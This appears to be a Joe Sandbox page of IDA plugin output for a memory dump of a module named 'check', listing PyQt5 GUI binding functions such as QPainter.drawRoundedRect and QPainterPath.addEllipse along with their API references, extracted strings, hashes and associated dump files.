Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?distanceDoubleFloat_FromPlane@Vector3$V1@00@V1@0@
String ID: BJ9J9$BJ9J9J9$QVector3D$distanceToPlane$distanceToPlane(self, plane: QVector3D, normal: QVector3D) -> floatdistanceToPlane(self, plane1: QVector3D, plane2: QVector3D, plane3: QVector3D) -> float
API String ID: 1747374115-3970635311
Opcode ID: c01807fab20fe83314067407c99e9df8a108f9269838532c668955ea757f3078
Instruction ID: 678115f1bf9e07bd4153861f578fa90d677b57eeb13b104bc3c05ce3b9566072
Opcode Fuzzy Hash: c01807fab20fe83314067407c99e9df8a108f9269838532c668955ea757f3078
Instruction Fuzzy Hash: 2B4145B6608F8685DB60CF21F4883AA77A8FB99780F504276DA8D43724DF3CD599CB40

Function 00007FFB9A2D9EF0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 316COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?map@QTransform@@QEBA?AVQPoint@@AEBV2@@Z.QT5GUI ref: 00007FFB9A2DA268
?map@QTransform@@QEBA?AVQPointF@@AEBV2@@Z.QT5GUI ref: 00007FFB9A2DA2EE
?map@QTransform@@QEBA?AVQLineF@@AEBV2@@Z.QT5GUI ref: 00007FFB9A2DA37A
_Py_Dealloc.PYTHON3 ref: 00007FFB9A2DA418

Part of subcall function 00007FFB9A3F9D18: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFB9A3F9D48

?map@QTransform@@QEBA?AVQLine@@AEBV2@@Z.QT5GUI ref: 00007FFB9A2DA3F0

Strings

J1J9, xrefs: 00007FFB9A2DA0ED, 00007FFB9A2DA28A
J9J9, xrefs: 00007FFB9A2D9F17, 00007FFB9A2DA210, 00007FFB9A2DA322, 00007FFB9A2DA398

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?map@Transform@@V2@@$Concurrency::cancel_current_taskDeallocLineLine@@PointPoint@@malloc
String ID: J1J9$J9J9
API String ID: 195627164-2568843907
Opcode ID: 36a2918275401c536ff13508c2a07f66cab95c845ef2f1bfb27fb68f89e8c33c
Instruction ID: 88d54c74e3543035e631deeaf8e3cbd111df7fce3b6d43c762f8bf8ea8706fe5
Opcode Fuzzy Hash: 36a2918275401c536ff13508c2a07f66cab95c845ef2f1bfb27fb68f89e8c33c
Instruction Fuzzy Hash: 39F1A0B2A09B4989E7618F36E4442A833A8FF5AB84F158776EE0D67761DF3CE044D710

Function 00007FFB9A357990 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

?drawRoundedRect@QPainter@@QEAAXAEBVQRectF@@NNW4SizeMode@Qt@@@Z.QT5GUI ref: 00007FFB9A357A5C

Strings

BJ9dd|E, xrefs: 00007FFB9A3579B8
Biiiidd|E, xrefs: 00007FFB9A357AF8
drawRoundedRect(self, rect: QRectF, xRadius: float, yRadius: float, mode: Qt.SizeMode = Qt.AbsoluteSize)drawRoundedRect(self, x: int, y: int, w: int, h: int, xRadius: float, yRadius: float, mode: Qt.SizeMode = Qt.AbsoluteSize)drawRoundedRect(self, rect: QRec, xrefs: 00007FFB9A357C61
drawRoundedRect, xrefs: 00007FFB9A357C6C
QPainter, xrefs: 00007FFB9A357C73

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?drawMode@Painter@@Qt@@@RectRect@RoundedSize
String ID: BJ9dd|E$Biiiidd|E$QPainter$drawRoundedRect$drawRoundedRect(self, rect: QRectF, xRadius: float, yRadius: float, mode: Qt.SizeMode = Qt.AbsoluteSize)drawRoundedRect(self, x: int, y: int, w: int, h: int, xRadius: float, yRadius: float, mode: Qt.SizeMode = Qt.AbsoluteSize)drawRoundedRect(self, rect: QRec
API String ID: 271538415-1207344993
Opcode ID: 5c34b787637081d8024e1b30f00e5c249184803754bddaa6b187d2e0231aa1b2
Instruction ID: 1d9d186daa68af672ae20ec61d2a070e4c1b63ff800393580ca82a013a0880f7
Opcode Fuzzy Hash: 5c34b787637081d8024e1b30f00e5c249184803754bddaa6b187d2e0231aa1b2
Instruction Fuzzy Hash: E991D576A08F5599E721CF75E88019E77B8FB49798F100266EE8D23B28EF38D195C740

Function 00007FFB9A35DB90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

??0QTextDocumentWriter@@QEAA@XZ.QT5GUI ref: 00007FFB9A35DBE9
??0QTextDocumentWriter@@QEAA@PEAVQIODevice@@AEBVQByteArray@@@Z.QT5GUI ref: 00007FFB9A35DC72

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

Strings

J8J1, xrefs: 00007FFB9A35DC3B
J1|J1, xrefs: 00007FFB9A35DD0D

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: DocumentTextWriter@@$Array@@@ByteDevice@@malloc
String ID: J1|J1$J8J1
API String ID: 3486399790-908227438
Opcode ID: 3ee34da659aeb34d85d177c757737551d9e371d8acdadaa9717a79a4a11ef541
Instruction ID: a02350db525cfe5075e2d53007a03cbe3330086501223d3d4ccb8d190c9f6032
Opcode Fuzzy Hash: 3ee34da659aeb34d85d177c757737551d9e371d8acdadaa9717a79a4a11ef541
Instruction Fuzzy Hash: 4351F6B6B18B4189FB608B66E8402A937B8FB49B88F10457ADE8D53B68DF3CD144C750

Function 00007FFB9A319B70 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

?setFormat@QSyntaxHighlighter@@IEAAXHHAEBVQTextCharFormat@@@Z.QT5GUI ref: 00007FFB9A319BF6
?setFormat@QSyntaxHighlighter@@IEAAXHHAEBVQColor@@@Z.QT5GUI ref: 00007FFB9A319C9C
?setFormat@QSyntaxHighlighter@@IEAAXHHAEBVQFont@@@Z.QT5GUI ref: 00007FFB9A319D31

Strings

setFormat, xrefs: 00007FFB9A319D4E
BiiJ9, xrefs: 00007FFB9A319BA1, 00007FFB9A319CDA
BiiJ1, xrefs: 00007FFB9A319C3E
setFormat(self, start: int, count: int, format: QTextCharFormat)setFormat(self, start: int, count: int, color: Union[QColor, Qt.GlobalColor])setFormat(self, start: int, count: int, font: QFont), xrefs: 00007FFB9A319D43
QSyntaxHighlighter, xrefs: 00007FFB9A319D55

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setFormat@Highlighter@@Syntax$CharColor@@@Font@@@Format@@@Text
String ID: BiiJ1$BiiJ9$QSyntaxHighlighter$setFormat$setFormat(self, start: int, count: int, format: QTextCharFormat)setFormat(self, start: int, count: int, color: Union[QColor, Qt.GlobalColor])setFormat(self, start: int, count: int, font: QFont)
API String ID: 1787067796-2653964744
Opcode ID: 1bf213333af16b4cc60e7c214b236e661136d5e9e35e064c5a442c5af3d30c6f
Instruction ID: 2ee4494aded4fcbd81fbe89427bfce17f23290eaeb079d7768c01454091bdb81
Opcode Fuzzy Hash: 1bf213333af16b4cc60e7c214b236e661136d5e9e35e064c5a442c5af3d30c6f
Instruction Fuzzy Hash: 4951E576A08F4699EB608F61E8842ED37B8FB48B88F544576DE8D13B28DF38D549C740

Function 00007FFB9A343BC0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 108COMMON

Download Yara Rule

APIs

?addEllipse@QPainterPath@@QEAAXAEBVQRectF@@@Z.QT5GUI ref: 00007FFB9A343C34
?addEllipse@QPainterPath@@QEAAXAEBVQPointF@@NN@Z.QT5GUI ref: 00007FFB9A343D6E

Strings

BJ9, xrefs: 00007FFB9A343BF3
BJ1dd, xrefs: 00007FFB9A343D0D
QPainterPath, xrefs: 00007FFB9A343DAE
addEllipse, xrefs: 00007FFB9A343DA7
Bdddd, xrefs: 00007FFB9A343C75
addEllipse(self, rect: QRectF)addEllipse(self, x: float, y: float, w: float, h: float)addEllipse(self, center: Union[QPointF, QPoint], rx: float, ry: float), xrefs: 00007FFB9A343D9C

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?addEllipse@PainterPath@@$F@@@PointRect
String ID: BJ1dd$BJ9$Bdddd$QPainterPath$addEllipse$addEllipse(self, rect: QRectF)addEllipse(self, x: float, y: float, w: float, h: float)addEllipse(self, center: Union[QPointF, QPoint], rx: float, ry: float)
API String ID: 2918516624-3440497614
Opcode ID: ea9bfd8e78bec367f063be4639763e19d2f4536506a359ae907263ba0bf15dcc
Instruction ID: a950abaafffe1d73430d94005fa6c200da5df4da07063b377079910b0caa5caf
Opcode Fuzzy Hash: ea9bfd8e78bec367f063be4639763e19d2f4536506a359ae907263ba0bf15dcc
Instruction Fuzzy Hash: A051E2B6609F46D9DB60CF34E8802AA33B8FB89788F505276EA4D47B28DF38D155C710

Function 00007FFB9A2EDB20 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

PyErr_Occurred.PYTHON3 ref: 00007FFB9A2EDB43
?matches@QKeyEvent@@QEBA_NW4StandardKey@QKeySequence@@@Z.QT5GUI ref: 00007FFB9A2EDBA4
PyBool_FromLong.PYTHON3 ref: 00007FFB9A2EDBAD

Strings

1J8, xrefs: 00007FFB9A2EDB6C

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?matches@Bool_Err_Event@@FromKey@LongOccurredSequence@@@Standard
String ID: 1J8
API String ID: 1744163412-4168894884
Opcode ID: 9e46db3686c42256c1caf7b4d8bd204558bc87d273a1e217d3e48bc2f7eb5c39
Instruction ID: ef7e168a41852c18e17465272abe153344c873d9c96340abeaec26290d342a8a
Opcode Fuzzy Hash: 9e46db3686c42256c1caf7b4d8bd204558bc87d273a1e217d3e48bc2f7eb5c39
Instruction Fuzzy Hash: 54314DA9A0CB5281EB608F65F44006AB774FB86B94F5444B2DF8D13B68DF7CD485D700

Function 00007FFB9A34FB60 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 102COMMON

Download Yara Rule

APIs

?eraseRect@QPainter@@QEAAXAEBVQRectF@@@Z.QT5GUI ref: 00007FFB9A34FBD0
??0QRectF@@QEAA@AEBVQRect@@@Z.QT5CORE ref: 00007FFB9A34FC51

Strings

Biiii, xrefs: 00007FFB9A34FC7B
BJ9, xrefs: 00007FFB9A34FB92, 00007FFB9A34FC0F
eraseRect(self, a0: QRectF)eraseRect(self, rect: QRect)eraseRect(self, x: int, y: int, w: int, h: int), xrefs: 00007FFB9A34FD0A
eraseRect, xrefs: 00007FFB9A34FD15
QPainter, xrefs: 00007FFB9A34FD1C

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Rect$?eraseF@@@Painter@@Rect@Rect@@@
String ID: BJ9$Biiii$QPainter$eraseRect$eraseRect(self, a0: QRectF)eraseRect(self, rect: QRect)eraseRect(self, x: int, y: int, w: int, h: int)
API String ID: 2523673470-3519423170
Opcode ID: caa5fd5c8f1d3e75545223f36e7360a7377eda0de07bac4e0704c946713cc40b
Instruction ID: 6cf019736c9851eaa814662b9b3d7f90e1343036c03090c04e1f2536aff3df36
Opcode Fuzzy Hash: caa5fd5c8f1d3e75545223f36e7360a7377eda0de07bac4e0704c946713cc40b
Instruction Fuzzy Hash: C8510676619F46D9EB60CF34E8902E933A8FB49B88F545276EA4D43B28EF38D155C700

Function 00007FFB9A351AD0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 74COMMON

Download Yara Rule

APIs

?insertRow@QStandardItem@@QEAAXHAEBV?$QList@PEAVQStandardItem@@@@@Z.QT5GUI ref: 00007FFB9A351B50
?insertRow@QStandardItem@@QEAAXHPEAV1@@Z.QT5GUI ref: 00007FFB9A351BFF

Strings

BiJ3, xrefs: 00007FFB9A351AE6
BiJ:, xrefs: 00007FFB9A351BBA
QStandardItem, xrefs: 00007FFB9A351C24
insertRow, xrefs: 00007FFB9A351C1D
insertRow(self, row: int, items: Iterable[QStandardItem])insertRow(self, arow: int, aitem: Optional[QStandardItem]), xrefs: 00007FFB9A351C11

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Standard$?insertItem@@Row@$Item@@@@@List@V1@@
